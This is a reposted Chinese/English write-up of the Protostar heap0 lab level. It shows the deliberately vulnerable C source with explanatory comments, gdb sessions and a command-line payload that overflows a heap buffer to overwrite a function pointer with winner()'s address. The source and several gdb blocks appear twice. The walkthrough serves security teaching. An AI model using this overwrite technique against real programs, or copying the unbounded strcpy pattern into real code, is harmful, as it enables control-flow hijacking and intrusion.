About
This level introduces heap overflows and how they can influence code flow.
This level is at /opt/protostar/bin/heap0
Source code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
/*
 * Victim buffer of the level. The only field is a fixed 64-byte name; the
 * strcpy() in main() writes argv[1] into it with no length check, so anything
 * longer than 63 characters (plus the terminating NUL) spills past the end
 * of the allocation into whatever malloc() placed next on the heap.
 */
struct data {
char name[64];
};
/*
 * Overwrite target. Holds a single old-style (unprototyped) function
 * pointer that main() sets to nowinner() and then calls. Because this
 * struct is allocated right after the struct data buffer, an overflow of
 * name[] can replace this pointer and redirect control flow.
 */
struct fp {
int (*fp)();
};
/*
 * Success marker for the level. Nothing in the program calls this directly;
 * it is reached only when f->fp in main() has been overwritten with its
 * address. Prints "level passed" followed by a newline.
 */
void winner()
{
    puts("level passed");
}
/*
 * Default target of f->fp in main(): the path taken when the function
 * pointer has not been tampered with. Prints "level has not been passed"
 * followed by a newline.
 */
void nowinner()
{
    fputs("level has not been passed\n", stdout);
}
/*
 * Entry point for the heap0 level. Allocates a 64-byte name buffer (d) and a
 * struct holding one function pointer (f), points that pointer at nowinner(),
 * copies argv[1] into d->name with an unbounded strcpy(), then calls through
 * f->fp.
 *
 * Deliberate vulnerability: strcpy() enforces no length, so an argv[1] longer
 * than 63 bytes (plus NUL) writes past d->name into the heap memory that
 * follows it. In the transcript on this page the program prints d at
 * 0x804a008 and f at 0x804a050, i.e. f->fp sits 72 bytes after the start of
 * name: 64 bytes of name, then 8 bytes that are presumably the malloc header
 * of f's chunk, then the 4-byte pointer (32-bit build). Supplying 72 filler
 * bytes followed by the little-endian address of winner() makes f->fp()
 * call winner() instead of nowinner().
 *
 * Other defects a reviewer would flag, left untouched because the level
 * depends on this exact code and heap layout:
 *  - argv[1] is never checked; running with no argument passes NULL to
 *    strcpy(), which is undefined behaviour (a crash in practice).
 *  - both malloc() results are used without a NULL check.
 *  - f->fp is declared int (*)() but is assigned void functions, an
 *    incompatible-pointer-type assignment compilers warn about.
 *  - main() falls off the end without a return statement (C99 treats this
 *    as returning 0, but it is poor form).
 */
int main(int argc, char **argv)
{
struct data *d;
struct fp *f;
/* Allocation order is load-bearing: d's chunk is handed out first and, in
 * the transcript below, f's chunk lands directly after it. */
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
/* Default call target; the overflow below overwrites this value. */
f->fp = nowinner;
/* Leaks both heap addresses, which is what makes the overwrite offset easy
 * to compute without guessing. */
printf("data is at %p, fp is at %p\n", d, f);
/* Unbounded copy of untrusted input into a 64-byte buffer: the heap overflow. */
strcpy(d->name, argv[1]);
/* Indirect call through the (possibly overwritten) function pointer. */
f->fp();
}
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
/*
 * Victim buffer of the level. The only field is a fixed 64-byte name; the
 * strcpy() in main() writes argv[1] into it with no length check, so anything
 * longer than 63 characters (plus the terminating NUL) spills past the end
 * of the allocation into whatever malloc() placed next on the heap.
 */
struct data {
char name[64];
};
/*
 * Overwrite target. Holds a single old-style (unprototyped) function
 * pointer that main() sets to nowinner() and then calls. Because this
 * struct is allocated right after the struct data buffer, an overflow of
 * name[] can replace this pointer and redirect control flow.
 */
struct fp {
int (*fp)();
};
/*
 * Success marker for the level. Nothing in the program calls this directly;
 * it is reached only when f->fp in main() has been overwritten with its
 * address. Prints "level passed" followed by a newline.
 */
void winner()
{
    puts("level passed");
}
/*
 * Default target of f->fp in main(): the path taken when the function
 * pointer has not been tampered with. Prints "level has not been passed"
 * followed by a newline.
 */
void nowinner()
{
    fputs("level has not been passed\n", stdout);
}
/*
 * Entry point for the heap0 level. Allocates a 64-byte name buffer (d) and a
 * struct holding one function pointer (f), points that pointer at nowinner(),
 * copies argv[1] into d->name with an unbounded strcpy(), then calls through
 * f->fp.
 *
 * Deliberate vulnerability: strcpy() enforces no length, so an argv[1] longer
 * than 63 bytes (plus NUL) writes past d->name into the heap memory that
 * follows it. In the transcript on this page the program prints d at
 * 0x804a008 and f at 0x804a050, i.e. f->fp sits 72 bytes after the start of
 * name: 64 bytes of name, then 8 bytes that are presumably the malloc header
 * of f's chunk, then the 4-byte pointer (32-bit build). Supplying 72 filler
 * bytes followed by the little-endian address of winner() makes f->fp()
 * call winner() instead of nowinner().
 *
 * Other defects a reviewer would flag, left untouched because the level
 * depends on this exact code and heap layout:
 *  - argv[1] is never checked; running with no argument passes NULL to
 *    strcpy(), which is undefined behaviour (a crash in practice).
 *  - both malloc() results are used without a NULL check.
 *  - f->fp is declared int (*)() but is assigned void functions, an
 *    incompatible-pointer-type assignment compilers warn about.
 *  - main() falls off the end without a return statement (C99 treats this
 *    as returning 0, but it is poor form).
 *  - this second copy of the listing also lacks #include <stdlib.h>, so
 *    malloc() would be implicitly declared if it were compiled as-is.
 */
int main(int argc, char **argv)
{
struct data *d;
struct fp *f;
/* Allocation order is load-bearing: d's chunk is handed out first and, in
 * the transcript below, f's chunk lands directly after it. */
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
/* Default call target; the overflow below overwrites this value. */
f->fp = nowinner;
/* Leaks both heap addresses, which is what makes the overwrite offset easy
 * to compute without guessing. */
printf("data is at %p, fp is at %p\n", d, f);
/* Unbounded copy of untrusted input into a 64-byte buffer: the heap overflow. */
strcpy(d->name, argv[1]);
/* Indirect call through the (possibly overwritten) function pointer. */
f->fp();
}
艰难地来到Heap部分。。。。。。。。。
目测可知需要利用 strcpy 的堆溢出覆盖 f->fp 的值(把它改成 winner 的地址)来达到目的,这种手法在 Stack 系列中已经遇到不少了,这里就不多说明了。
user@protostar:/opt/protostar/bin$ gdb -q ./heap0
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) b *main
Breakpoint 1 at 0x804848c: file heap0/heap0.c, line 26.
(gdb) r
Starting program: /opt/protostar/bin/heap0
Breakpoint 1, main (argc=1, argv=0xbffff864) at heap0/heap0.c:26
26 heap0/heap0.c: No such file or directory.
in heap0/heap0.c
(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) b *main
Breakpoint 1 at 0x804848c: file heap0/heap0.c, line 26.
(gdb) r
Starting program: /opt/protostar/bin/heap0
Breakpoint 1, main (argc=1, argv=0xbffff864) at heap0/heap0.c:26
26 heap0/heap0.c: No such file or directory.
in heap0/heap0.c
(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>
得到 winner 的地址是 0x08048464。
user@protostar:/opt/protostar/bin$ gdb -q ./heap0
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) r `python -c 'print "a"*64+"12345678901234567890"'`
Starting program: /opt/protostar/bin/heap0 `python -c 'print "a"*64+"12345678901234567890"'`
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x32313039 in ?? ()
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) r `python -c 'print "a"*64+"12345678901234567890"'`
Starting program: /opt/protostar/bin/heap0 `python -c 'print "a"*64+"12345678901234567890"'`
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x32313039 in ?? ()
崩溃地址 0x32313039 按小端序就是字符串 "9012",也就是输入中第 73–76 个字节,这与 fp - data = 0x804a050 - 0x804a008 = 72 一致:64 字节的 name 之后还有 8 字节(应为 f 所在堆块的 malloc 元数据),再往后才是 f->fp。所以只需把这 4 个字节换成 winner 的地址(小端序 \x64\x84\x04\x08)即可。OK,修改之。
user@protostar:/opt/protostar/bin$ ./heap0 `python -c 'print "a"*64+"12345678\x64\x84\x04\x08"'`
data is at 0x804a008, fp is at 0x804a050
level passed
data is at 0x804a008, fp is at 0x804a050
level passed
转载于:https://blog.51cto.com/terrying/1182603